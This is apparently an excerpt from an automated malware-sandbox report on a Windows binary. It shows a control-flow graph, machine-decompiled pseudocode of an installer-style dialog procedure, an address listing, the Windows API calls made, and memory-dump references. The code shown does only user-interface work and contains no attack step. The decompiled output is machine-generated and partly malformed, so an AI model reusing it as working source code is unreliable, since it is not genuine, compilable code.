                                                                                                                                                                                      control_flow_graph 190 403e86-403e98 191 403fd9-403fe8 190->191 192 403e9e-403ea4 190->192 194 404037-40404c 191->194 195 403fea-404032 GetDlgItem * 2 call 40435f SetClassLongW call 40140b 191->195 192->191 193 403eaa-403eb3 192->193 198 403eb5-403ec2 SetWindowPos 193->198 199 403ec8-403ecb 193->199 196 40408c-404091 call 4043ab 194->196 197 40404e-404051 194->197 195->194 212 404096-4040b1 196->212 201 404053-40405e call 401389 197->201 202 404084-404086 197->202 198->199 204 403ee5-403eeb 199->204 205 403ecd-403edf ShowWindow 199->205 201->202 223 404060-40407f SendMessageW 201->223 202->196 211 40432c 202->211 207 403f07-403f0a 204->207 208 403eed-403f02 DestroyWindow 204->208 205->204 216 403f0c-403f18 SetWindowLongW 207->216 217 403f1d-403f23 207->217 213 404309-40430f 208->213 215 40432e-404335 211->215 219 4040b3-4040b5 call 40140b 212->219 220 4040ba-4040c0 212->220 213->211 225 404311-404317 213->225 216->215 221 403fc6-403fd4 call 4043c6 217->221 222 403f29-403f3a GetDlgItem 217->222 219->220 226 4040c6-4040d1 220->226 227 4042ea-404303 DestroyWindow EndDialog 220->227 221->215 229 403f59-403f5c 222->229 230 403f3c-403f53 SendMessageW IsWindowEnabled 222->230 223->215 225->211 232 404319-404322 ShowWindow 225->232 226->227 228 4040d7-404124 call 40640a call 40435f * 3 GetDlgItem 226->228 227->213 260 404126-40412b 228->260 261 40412e-40416a ShowWindow KiUserCallbackDispatcher call 404381 EnableWindow 228->261 234 403f61-403f64 229->234 235 403f5e-403f5f 229->235 230->211 230->229 232->211 239 403f72-403f77 234->239 240 403f66-403f6c 234->240 238 403f8f-403f94 call 404338 235->238 238->221 243 403fad-403fc0 SendMessageW 239->243 245 403f79-403f7f 239->245 240->243 244 403f6e-403f70 240->244 243->221 244->238 248 403f81-403f87 call 40140b 245->248 249 403f96-403f9f call 40140b 245->249 256 403f8d 248->256 249->221 258 403fa1-403fab 249->258 256->238 258->256 260->261 264 40416c-40416d 261->264 265 40416f 261->265 266 404171-40419f GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 4041a1-4041b2 SendMessageW 266->267 268 4041b4 266->268 269 4041ba-4041f9 call 404394 call 403e67 call 4063e8 lstrlenW call 40640a SetWindowTextW call 401389 267->269 268->269 269->212 280 4041ff-404201 269->280 280->212 281 404207-40420b 280->281 282 40422a-40423e DestroyWindow 281->282 283 40420d-404213 281->283 282->213 285 404244-404271 CreateDialogParamW 282->285 283->211 284 404219-40421f 283->284 284->212 286 404225 284->286 285->213 287 404277-4042ce call 40435f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->211 287->211 292 4042d0-4042e3 ShowWindow call 4043ab 287->292 294 4042e8 292->294 294->213
                                                                                                                                                                                      C-Code - Quality: 83%
                                                                                                                                                                                      			E00403E86(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                                                                                                                                                      				struct HWND__* _v32;
                                                                                                                                                                                      				void* _v84;
                                                                                                                                                                                      				void* _v88;
                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                      				signed int _t37;
                                                                                                                                                                                      				signed int _t39;
                                                                                                                                                                                      				signed int _t41;
                                                                                                                                                                                      				struct HWND__* _t51;
                                                                                                                                                                                      				signed int _t70;
                                                                                                                                                                                      				struct HWND__* _t76;
                                                                                                                                                                                      				signed int _t89;
                                                                                                                                                                                      				struct HWND__* _t94;
                                                                                                                                                                                      				signed int _t102;
                                                                                                                                                                                      				int _t106;
                                                                                                                                                                                      				signed int _t118;
                                                                                                                                                                                      				signed int _t119;
                                                                                                                                                                                      				int _t120;
                                                                                                                                                                                      				signed int _t125;
                                                                                                                                                                                      				struct HWND__* _t128;
                                                                                                                                                                                      				struct HWND__* _t129;
                                                                                                                                                                                      				int _t130;
                                                                                                                                                                                      				long _t133;
                                                                                                                                                                                      				int _t135;
                                                                                                                                                                                      				int _t136;
                                                                                                                                                                                      				void* _t137;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t118 = _a8;
                                                                                                                                                                                      				if(_t118 == 0x110 || _t118 == 0x408) {
                                                                                                                                                                                      					_t37 = _a12;
                                                                                                                                                                                      					_t128 = _a4;
                                                                                                                                                                                      					__eflags = _t118 - 0x110;
                                                                                                                                                                                      					 *0x423710 = _t37;
                                                                                                                                                                                      					if(_t118 == 0x110) {
                                                                                                                                                                                      						 *0x42a248 = _t128;
                                                                                                                                                                                      						 *0x423724 = GetDlgItem(_t128, 1);
                                                                                                                                                                                      						_t94 = GetDlgItem(_t128, 2);
                                                                                                                                                                                      						_push(0xffffffff);
                                                                                                                                                                                      						_push(0x1c);
                                                                                                                                                                                      						 *0x4216f0 = _t94;
                                                                                                                                                                                      						E0040435F(_t128);
                                                                                                                                                                                      						SetClassLongW(_t128, 0xfffffff2,  *0x429228);
                                                                                                                                                                                      						 *0x42920c = E0040140B(4);
                                                                                                                                                                                      						_t37 = 1;
                                                                                                                                                                                      						__eflags = 1;
                                                                                                                                                                                      						 *0x423710 = 1;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t125 =  *0x40a39c; // 0x0
                                                                                                                                                                                      					_t136 = 0;
                                                                                                                                                                                      					_t133 = (_t125 << 6) +  *0x42a280;
                                                                                                                                                                                      					__eflags = _t125;
                                                                                                                                                                                      					if(_t125 < 0) {
                                                                                                                                                                                      						L34:
                                                                                                                                                                                      						E004043AB(0x40b);
                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                      							_t39 =  *0x423710;
                                                                                                                                                                                      							 *0x40a39c =  *0x40a39c + _t39;
                                                                                                                                                                                      							_t133 = _t133 + (_t39 << 6);
                                                                                                                                                                                      							_t41 =  *0x40a39c; // 0x0
                                                                                                                                                                                      							__eflags = _t41 -  *0x42a284;
                                                                                                                                                                                      							if(_t41 ==  *0x42a284) {
                                                                                                                                                                                      								E0040140B(1);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags =  *0x42920c - _t136;
                                                                                                                                                                                      							if( *0x42920c != _t136) {
                                                                                                                                                                                      								break;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags =  *0x40a39c -  *0x42a284; // 0x0
                                                                                                                                                                                      							if(__eflags >= 0) {
                                                                                                                                                                                      								break;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t119 =  *(_t133 + 0x14);
                                                                                                                                                                                      							E0040640A(_t119, _t128, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
                                                                                                                                                                                      							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                                                                                                                                                      							_push(0xfffffc19);
                                                                                                                                                                                      							E0040435F(_t128);
                                                                                                                                                                                      							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                                                                                                                                                      							_push(0xfffffc1b);
                                                                                                                                                                                      							E0040435F(_t128);
                                                                                                                                                                                      							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                                                                                                                                                      							_push(0xfffffc1a);
                                                                                                                                                                                      							E0040435F(_t128);
                                                                                                                                                                                      							_t51 = GetDlgItem(_t128, 3);
                                                                                                                                                                                      							__eflags =  *0x42a2ec - _t136;
                                                                                                                                                                                      							_v32 = _t51;
                                                                                                                                                                                      							if( *0x42a2ec != _t136) {
                                                                                                                                                                                      								_t119 = _t119 & 0x0000fefd | 0x00000004;
                                                                                                                                                                                      								__eflags = _t119;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							ShowWindow(_t51, _t119 & 0x00000008); // executed
                                                                                                                                                                                      							EnableWindow( *(_t137 + 0x30), _t119 & 0x00000100); // executed
                                                                                                                                                                                      							E00404381(_t119 & 0x00000002);
                                                                                                                                                                                      							_t120 = _t119 & 0x00000004;
                                                                                                                                                                                      							EnableWindow( *0x4216f0, _t120);
                                                                                                                                                                                      							__eflags = _t120 - _t136;
                                                                                                                                                                                      							if(_t120 == _t136) {
                                                                                                                                                                                      								_push(1);
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_push(_t136);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							EnableMenuItem(GetSystemMenu(_t128, _t136), 0xf060, ??);
                                                                                                                                                                                      							SendMessageW( *(_t137 + 0x38), 0xf4, _t136, 1);
                                                                                                                                                                                      							__eflags =  *0x42a2ec - _t136;
                                                                                                                                                                                      							if( *0x42a2ec == _t136) {
                                                                                                                                                                                      								_push( *0x423724);
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								SendMessageW(_t128, 0x401, 2, _t136);
                                                                                                                                                                                      								_push( *0x4216f0);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							E00404394();
                                                                                                                                                                                      							E004063E8(0x423728, E00403E67());
                                                                                                                                                                                      							E0040640A(0x423728, _t128, _t133,  &(0x423728[lstrlenW(0x423728)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                                                                                                                                                      							SetWindowTextW(_t128, 0x423728); // executed
                                                                                                                                                                                      							_push(_t136);
                                                                                                                                                                                      							_t70 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                                                                                                                                                                      							__eflags = _t70;
                                                                                                                                                                                      							if(_t70 != 0) {
                                                                                                                                                                                      								continue;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								__eflags =  *_t133 - _t136;
                                                                                                                                                                                      								if( *_t133 == _t136) {
                                                                                                                                                                                      									continue;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__eflags =  *(_t133 + 4) - 5;
                                                                                                                                                                                      								if( *(_t133 + 4) != 5) {
                                                                                                                                                                                      									DestroyWindow( *0x429218); // executed
                                                                                                                                                                                      									 *0x422700 = _t133;
                                                                                                                                                                                      									__eflags =  *_t133 - _t136;
                                                                                                                                                                                      									if( *_t133 <= _t136) {
                                                                                                                                                                                      										goto L58;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t76 = CreateDialogParamW( *0x42a240,  *_t133 +  *0x429220 & 0x0000ffff, _t128,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133); // executed
                                                                                                                                                                                      									__eflags = _t76 - _t136;
                                                                                                                                                                                      									 *0x429218 = _t76;
                                                                                                                                                                                      									if(_t76 == _t136) {
                                                                                                                                                                                      										goto L58;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                                                                                                                                                      									_push(6);
                                                                                                                                                                                      									E0040435F(_t76);
                                                                                                                                                                                      									GetWindowRect(GetDlgItem(_t128, 0x3fa), _t137 + 0x10);
                                                                                                                                                                                      									ScreenToClient(_t128, _t137 + 0x10);
                                                                                                                                                                                      									SetWindowPos( *0x429218, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                                                                                                                                                      									_push(_t136);
                                                                                                                                                                                      									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                                                                                                                                                                      									__eflags =  *0x42920c - _t136;
                                                                                                                                                                                      									if( *0x42920c != _t136) {
                                                                                                                                                                                      										goto L61;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									ShowWindow( *0x429218, 8); // executed
                                                                                                                                                                                      									E004043AB(0x405);
                                                                                                                                                                                      									goto L58;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__eflags =  *0x42a2ec - _t136;
                                                                                                                                                                                      								if( *0x42a2ec != _t136) {
                                                                                                                                                                                      									goto L61;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__eflags =  *0x42a2e0 - _t136;
                                                                                                                                                                                      								if( *0x42a2e0 != _t136) {
                                                                                                                                                                                      									continue;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								goto L61;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      						DestroyWindow( *0x429218);
                                                                                                                                                                                      						 *0x42a248 = _t136;
                                                                                                                                                                                      						EndDialog(_t128,  *0x421ef8);
                                                                                                                                                                                      						goto L58;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						__eflags = _t37 - 1;
                                                                                                                                                                                      						if(_t37 != 1) {
                                                                                                                                                                                      							L33:
                                                                                                                                                                                      							__eflags =  *_t133 - _t136;
                                                                                                                                                                                      							if( *_t133 == _t136) {
                                                                                                                                                                                      								goto L61;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							goto L34;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                      						_t89 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                                                                                                                                                                      						__eflags = _t89;
                                                                                                                                                                                      						if(_t89 == 0) {
                                                                                                                                                                                      							goto L33;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						SendMessageW( *0x429218, 0x40f, 0, 1);
                                                                                                                                                                                      						__eflags =  *0x42920c;
                                                                                                                                                                                      						return 0 |  *0x42920c == 0x00000000;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					_t128 = _a4;
                                                                                                                                                                                      					_t136 = 0;
                                                                                                                                                                                      					if(_t118 == 0x47) {
                                                                                                                                                                                      						SetWindowPos( *0x423708, _t128, 0, 0, 0, 0, 0x13);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					if(_t118 == 5) {
                                                                                                                                                                                      						asm("sbb eax, eax");
                                                                                                                                                                                      						ShowWindow( *0x423708,  ~(_a12 - 1) & _t118);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					if(_t118 != 0x40d) {
                                                                                                                                                                                      						__eflags = _t118 - 0x11;
                                                                                                                                                                                      						if(_t118 != 0x11) {
                                                                                                                                                                                      							__eflags = _t118 - 0x111;
                                                                                                                                                                                      							if(_t118 != 0x111) {
                                                                                                                                                                                      								L26:
                                                                                                                                                                                      								return E004043C6(_t118, _a12, _a16);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t135 = _a12 & 0x0000ffff;
                                                                                                                                                                                      							_t129 = GetDlgItem(_t128, _t135);
                                                                                                                                                                                      							__eflags = _t129 - _t136;
                                                                                                                                                                                      							if(_t129 == _t136) {
                                                                                                                                                                                      								L13:
                                                                                                                                                                                      								__eflags = _t135 - 1;
                                                                                                                                                                                      								if(_t135 != 1) {
                                                                                                                                                                                      									__eflags = _t135 - 3;
                                                                                                                                                                                      									if(_t135 != 3) {
                                                                                                                                                                                      										_t130 = 2;
                                                                                                                                                                                      										__eflags = _t135 - _t130;
                                                                                                                                                                                      										if(_t135 != _t130) {
                                                                                                                                                                                      											L25:
                                                                                                                                                                                      											SendMessageW( *0x429218, 0x111, _a12, _a16);
                                                                                                                                                                                      											goto L26;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										__eflags =  *0x42a2ec - _t136;
                                                                                                                                                                                      										if( *0x42a2ec == _t136) {
                                                                                                                                                                                      											_t102 = E0040140B(3);
                                                                                                                                                                                      											__eflags = _t102;
                                                                                                                                                                                      											if(_t102 != 0) {
                                                                                                                                                                                      												goto L26;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											 *0x421ef8 = 1;
                                                                                                                                                                                      											L21:
                                                                                                                                                                                      											_push(0x78);
                                                                                                                                                                                      											L22:
                                                                                                                                                                                      											E00404338();
                                                                                                                                                                                      											goto L26;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										E0040140B(_t130);
                                                                                                                                                                                      										 *0x421ef8 = _t130;
                                                                                                                                                                                      										goto L21;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									__eflags =  *0x40a39c - _t136; // 0x0
                                                                                                                                                                                      									if(__eflags <= 0) {
                                                                                                                                                                                      										goto L25;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_push(0xffffffff);
                                                                                                                                                                                      									goto L22;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_push(_t135);
                                                                                                                                                                                      								goto L22;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							SendMessageW(_t129, 0xf3, _t136, _t136);
                                                                                                                                                                                      							_t106 = IsWindowEnabled(_t129);
                                                                                                                                                                                      							__eflags = _t106;
                                                                                                                                                                                      							if(_t106 == 0) {
                                                                                                                                                                                      								goto L61;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							goto L13;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						SetWindowLongW(_t128, _t136, _t136);
                                                                                                                                                                                      						return 1;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						DestroyWindow( *0x429218);
                                                                                                                                                                                      						 *0x429218 = _a12;
                                                                                                                                                                                      						L58:
                                                                                                                                                                                      						if( *0x425728 == _t136 &&  *0x429218 != _t136) {
                                                                                                                                                                                      							ShowWindow(_t128, 0xa); // executed
                                                                                                                                                                                      							 *0x425728 = 1;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						L61:
                                                                                                                                                                                      						return 0;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}






























                                                                                                                                                                                      0x00403e8f
                                                                                                                                                                                      0x00403e98
                                                                                                                                                                                      0x00403fd9
                                                                                                                                                                                      0x00403fdd
                                                                                                                                                                                      0x00403fe1
                                                                                                                                                                                      0x00403fe3
                                                                                                                                                                                      0x00403fe8
                                                                                                                                                                                      0x00403ff3
                                                                                                                                                                                      0x00403ffe
                                                                                                                                                                                      0x00404003
                                                                                                                                                                                      0x00404005
                                                                                                                                                                                      0x00404007
                                                                                                                                                                                      0x0040400a
                                                                                                                                                                                      0x0040400f
                                                                                                                                                                                      0x0040401d
                                                                                                                                                                                      0x0040402a
                                                                                                                                                                                      0x00404031
                                                                                                                                                                                      0x00404031
                                                                                                                                                                                      0x00404032
                                                                                                                                                                                      0x00404032
                                                                                                                                                                                      0x00404037
                                                                                                                                                                                      0x0040403d
                                                                                                                                                                                      0x00404044
                                                                                                                                                                                      0x0040404a
                                                                                                                                                                                      0x0040404c
                                                                                                                                                                                      0x0040408c
                                                                                                                                                                                      0x00404091
                                                                                                                                                                                      0x00404096
                                                                                                                                                                                      0x00404096
                                                                                                                                                                                      0x0040409b
                                                                                                                                                                                      0x004040a4
                                                                                                                                                                                      0x004040a6
                                                                                                                                                                                      0x004040ab
                                                                                                                                                                                      0x004040b1
                                                                                                                                                                                      0x004040b5
                                                                                                                                                                                      0x004040b5
                                                                                                                                                                                      0x004040ba
                                                                                                                                                                                      0x004040c0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004040cb
                                                                                                                                                                                      0x004040d1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004040da
                                                                                                                                                                                      0x004040e2
                                                                                                                                                                                      0x004040e7
                                                                                                                                                                                      0x004040ea
                                                                                                                                                                                      0x004040f0
                                                                                                                                                                                      0x004040f5
                                                                                                                                                                                      0x004040f8
                                                                                                                                                                                      0x004040fe
                                                                                                                                                                                      0x00404103
                                                                                                                                                                                      0x00404106
                                                                                                                                                                                      0x0040410c
                                                                                                                                                                                      0x00404114
                                                                                                                                                                                      0x0040411a
                                                                                                                                                                                      0x00404120
                                                                                                                                                                                      0x00404124
                                                                                                                                                                                      0x0040412b
                                                                                                                                                                                      0x0040412b
                                                                                                                                                                                      0x0040412b
                                                                                                                                                                                      0x00404135
                                                                                                                                                                                      0x00404147
                                                                                                                                                                                      0x00404153
                                                                                                                                                                                      0x00404158
                                                                                                                                                                                      0x00404162
                                                                                                                                                                                      0x00404168
                                                                                                                                                                                      0x0040416a
                                                                                                                                                                                      0x0040416f
                                                                                                                                                                                      0x0040416c
                                                                                                                                                                                      0x0040416c
                                                                                                                                                                                      0x0040416c
                                                                                                                                                                                      0x0040417f
                                                                                                                                                                                      0x00404197
                                                                                                                                                                                      0x00404199
                                                                                                                                                                                      0x0040419f
                                                                                                                                                                                      0x004041b4
                                                                                                                                                                                      0x004041a1
                                                                                                                                                                                      0x004041aa
                                                                                                                                                                                      0x004041ac
                                                                                                                                                                                      0x004041ac
                                                                                                                                                                                      0x004041ba
                                                                                                                                                                                      0x004041cb
                                                                                                                                                                                      0x004041e1
                                                                                                                                                                                      0x004041e8
                                                                                                                                                                                      0x004041ee
                                                                                                                                                                                      0x004041f2
                                                                                                                                                                                      0x004041f7
                                                                                                                                                                                      0x004041f9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004041ff
                                                                                                                                                                                      0x004041ff
                                                                                                                                                                                      0x00404201
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00404207
                                                                                                                                                                                      0x0040420b
                                                                                                                                                                                      0x00404230
                                                                                                                                                                                      0x00404236
                                                                                                                                                                                      0x0040423c
                                                                                                                                                                                      0x0040423e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00404264
                                                                                                                                                                                      0x0040426a
                                                                                                                                                                                      0x0040426c
                                                                                                                                                                                      0x00404271
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00404277
                                                                                                                                                                                      0x0040427a
                                                                                                                                                                                      0x0040427d
                                                                                                                                                                                      0x00404294
                                                                                                                                                                                      0x004042a0
                                                                                                                                                                                      0x004042b9
                                                                                                                                                                                      0x004042bf
                                                                                                                                                                                      0x004042c3
                                                                                                                                                                                      0x004042c8
                                                                                                                                                                                      0x004042ce
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004042d8
                                                                                                                                                                                      0x004042e3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004042e3
                                                                                                                                                                                      0x0040420d
                                                                                                                                                                                      0x00404213
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00404219
                                                                                                                                                                                      0x0040421f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00404225
                                                                                                                                                                                      0x004041f9
                                                                                                                                                                                      0x004042f0
                                                                                                                                                                                      0x004042fc
                                                                                                                                                                                      0x00404303
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040404e
                                                                                                                                                                                      0x0040404e
                                                                                                                                                                                      0x00404051
                                                                                                                                                                                      0x00404084
                                                                                                                                                                                      0x00404084
                                                                                                                                                                                      0x00404086
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00404086
                                                                                                                                                                                      0x00404053
                                                                                                                                                                                      0x00404057
                                                                                                                                                                                      0x0040405c
                                                                                                                                                                                      0x0040405e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040406e
                                                                                                                                                                                      0x00404076
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040407c
                                                                                                                                                                                      0x00403eaa
                                                                                                                                                                                      0x00403eaa
                                                                                                                                                                                      0x00403eae
                                                                                                                                                                                      0x00403eb3
                                                                                                                                                                                      0x00403ec2
                                                                                                                                                                                      0x00403ec2
                                                                                                                                                                                      0x00403ecb
                                                                                                                                                                                      0x00403ed4
                                                                                                                                                                                      0x00403edf
                                                                                                                                                                                      0x00403edf
                                                                                                                                                                                      0x00403eeb
                                                                                                                                                                                      0x00403f07
                                                                                                                                                                                      0x00403f0a
                                                                                                                                                                                      0x00403f1d
                                                                                                                                                                                      0x00403f23
                                                                                                                                                                                      0x00403fc6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403fcf
                                                                                                                                                                                      0x00403f29
                                                                                                                                                                                      0x00403f36
                                                                                                                                                                                      0x00403f38
                                                                                                                                                                                      0x00403f3a
                                                                                                                                                                                      0x00403f59
                                                                                                                                                                                      0x00403f59
                                                                                                                                                                                      0x00403f5c
                                                                                                                                                                                      0x00403f61
                                                                                                                                                                                      0x00403f64
                                                                                                                                                                                      0x00403f74
                                                                                                                                                                                      0x00403f75
                                                                                                                                                                                      0x00403f77
                                                                                                                                                                                      0x00403fad
                                                                                                                                                                                      0x00403fc0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403fc0
                                                                                                                                                                                      0x00403f79
                                                                                                                                                                                      0x00403f7f
                                                                                                                                                                                      0x00403f98
                                                                                                                                                                                      0x00403f9d
                                                                                                                                                                                      0x00403f9f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403fa1
                                                                                                                                                                                      0x00403f8d
                                                                                                                                                                                      0x00403f8d
                                                                                                                                                                                      0x00403f8f
                                                                                                                                                                                      0x00403f8f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403f8f
                                                                                                                                                                                      0x00403f82
                                                                                                                                                                                      0x00403f87
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403f87
                                                                                                                                                                                      0x00403f66
                                                                                                                                                                                      0x00403f6c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403f6e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403f6e
                                                                                                                                                                                      0x00403f5e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403f5e
                                                                                                                                                                                      0x00403f44
                                                                                                                                                                                      0x00403f4b
                                                                                                                                                                                      0x00403f51
                                                                                                                                                                                      0x00403f53
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403f53
                                                                                                                                                                                      0x00403f0f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403eed
                                                                                                                                                                                      0x00403ef3
                                                                                                                                                                                      0x00403efd
                                                                                                                                                                                      0x00404309
                                                                                                                                                                                      0x0040430f
                                                                                                                                                                                      0x0040431c
                                                                                                                                                                                      0x00404322
                                                                                                                                                                                      0x00404322
                                                                                                                                                                                      0x0040432c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040432c
                                                                                                                                                                                      0x00403eeb

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                                                                                                      • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                                                                                                      • DestroyWindow.USER32 ref: 00403EF3
                                                                                                                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                                                                                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                                                                                                      • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404147
                                                                                                                                                                                      • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                                                                                                                                                      • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
                                                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                                                                                                      • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                                                                                                                      • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                                                                                                                      • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
